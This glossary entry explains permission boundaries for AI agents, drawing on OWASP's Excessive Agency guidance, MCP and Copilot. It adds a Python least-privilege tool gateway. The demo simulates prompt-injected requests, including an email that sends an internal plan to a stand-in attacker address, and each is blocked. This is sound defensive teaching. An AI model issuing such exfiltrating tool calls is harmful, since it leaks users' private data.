Glossary term
Agentic Systems
The explicit limit on which tools, APIs, data, and actions an AI system may reach. A weak permission boundary turns model output errors or prompt-injection attacks into real operational impact, because an attacker who steers the model inherits everything the model can touch. The boundary should be enforced technically (a tool allowlist, scoped credentials, approval gates), not only described in policy, and should be reviewed whenever a new tool or integration is added.
OWASP LLM06:2025 Excessive Agency names excessive functionality, excessive permissions, and excessive autonomy as the three common failure modes, mitigated through least-privilege tool boundaries and, for high-impact actions, explicit human approval.
Anthropic's Model Context Protocol (MCP) has each server declare the tools and resources it exposes, so the host can scope an agent to exactly that declared set rather than to arbitrary capabilities.
Microsoft Copilot's identity propagation executes tool calls under the calling user's permissions rather than under a broader agent identity, so the agent can reach only what that user could already access.
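The three controls above (a declared tool set, per-tool scopes checked against the caller, and identity propagation so the tool enforces the user's own ACLs) can be combined in a small tool gateway. The code below is an added illustration written for this entry; it is not OWASP, MCP or Microsoft code, and every name in it (`ToolGateway`, `Principal`, the `docs:read`/`mail:send`/`admin:write` scopes, the sample documents) is a hypothetical construction. It also shows the approval gate OWASP recommends for mutating actions, which the text mentions only in passing.

```python
"""Least-privilege tool gateway for an LLM agent (added, hypothetical example)."""
from dataclasses import dataclass
from typing import Any, Callable


class PermissionDenied(Exception):
    """Raised when a tool call falls outside the caller's permission boundary."""


@dataclass(frozen=True)
class Principal:
    # The identity a tool call executes under. Scopes are explicit grants;
    # nothing is reachable unless a scope says so.
    name: str
    scopes: frozenset


@dataclass(frozen=True)
class Tool:
    name: str
    scope: str                 # scope the caller must hold to invoke this tool
    mutating: bool             # mutating tools additionally need an approval
    fn: Callable[..., Any]     # always receives the calling Principal first


class ToolGateway:
    """Single choke point between the model's tool requests and real actions."""

    def __init__(self, approve: Callable[[Principal, str, dict], bool]):
        self._tools: dict[str, Tool] = {}
        self._approve = approve          # human / policy check for mutating calls
        self.audit: list[tuple[str, str, str]] = []

    def register(self, tool: Tool) -> None:
        self._tools[tool.name] = tool

    def declared_tools(self, principal: Principal) -> list[str]:
        # Advertise only what the caller may use, so the model is never shown
        # (and cannot be talked into calling) a tool outside its boundary.
        return sorted(t.name for t in self._tools.values() if t.scope in principal.scopes)

    def call(self, principal: Principal, tool_name: str, **args) -> Any:
        tool = self._tools.get(tool_name)
        if tool is None:                                   # undeclared tool
            self.audit.append((principal.name, tool_name, "denied:undeclared"))
            raise PermissionDenied(f"{tool_name!r} is not a declared tool")
        if tool.scope not in principal.scopes:             # missing scope
            self.audit.append((principal.name, tool_name, "denied:scope"))
            raise PermissionDenied(f"{principal.name} lacks scope {tool.scope!r}")
        if tool.mutating and not self._approve(principal, tool_name, args):
            self.audit.append((principal.name, tool_name, "denied:approval"))
            raise PermissionDenied(f"{tool_name!r} requires approval")
        try:
            # Identity propagation: the tool runs as the user, not as "the agent",
            # so resource-level ACLs are evaluated against the real caller.
            result = tool.fn(principal, **args)
        except PermissionDenied:
            self.audit.append((principal.name, tool_name, "denied:resource"))
            raise
        self.audit.append((principal.name, tool_name, "allowed"))
        return result


# --- Constructed sample resources and tools (not a real API) -----------------
DOCUMENTS = {
    "doc-1": {"readers": {"alice", "bob"}, "body": "Q3 plan"},
    "doc-2": {"readers": {"carol"}, "body": "salary review"},
}


def read_document(caller: Principal, doc_id: str) -> str:
    doc = DOCUMENTS.get(doc_id)
    if doc is None or caller.name not in doc["readers"]:
        raise PermissionDenied(f"{caller.name} may not read {doc_id}")
    return doc["body"]


def send_email(caller: Principal, to: str, body: str) -> str:
    return f"sent as {caller.name} to {to}"


def build_gateway(approve: Callable[[Principal, str, dict], bool] = lambda p, t, a: False) -> ToolGateway:
    gw = ToolGateway(approve)
    gw.register(Tool("read_document", "docs:read", False, read_document))
    gw.register(Tool("send_email", "mail:send", True, send_email))
    gw.register(Tool("delete_account", "admin:write", True, lambda caller, user: f"deleted {user}"))
    return gw


def demo() -> tuple[dict, list]:
    # Approval policy: only outbound mail to the organisation's own domain is auto-approved.
    gw = build_gateway(approve=lambda p, t, a: t == "send_email" and a.get("to", "").endswith("@example.com"))
    bob = Principal("bob", frozenset({"docs:read", "mail:send"}))
    results: dict = {"tools": gw.declared_tools(bob)}
    results["read_ok"] = gw.call(bob, "read_document", doc_id="doc-1")
    # Three requests a prompt-injected model might emit; each is stopped at a different layer.
    for name, args in [("read_document", {"doc_id": "doc-2"}),                       # resource ACL
                       ("delete_account", {"user": "carol"}),                      # scope
                       ("send_email", {"to": "attacker@evil.test", "body": "Q3 plan"})]:  # approval
        try:
            gw.call(bob, name, **args)
        except PermissionDenied as exc:
            results[name] = str(exc)
    return results, gw.audit


if __name__ == "__main__":
    for line in demo()[1]:
        print(line)
```

The gateway is the place to put the review the entry calls for: a new integration is a new `Tool` registration with its own scope, and the audit trail shows which layer (declaration, scope, approval, resource ACL) stopped each request, which is exactly the evidence you want when assessing whether a boundary is too wide.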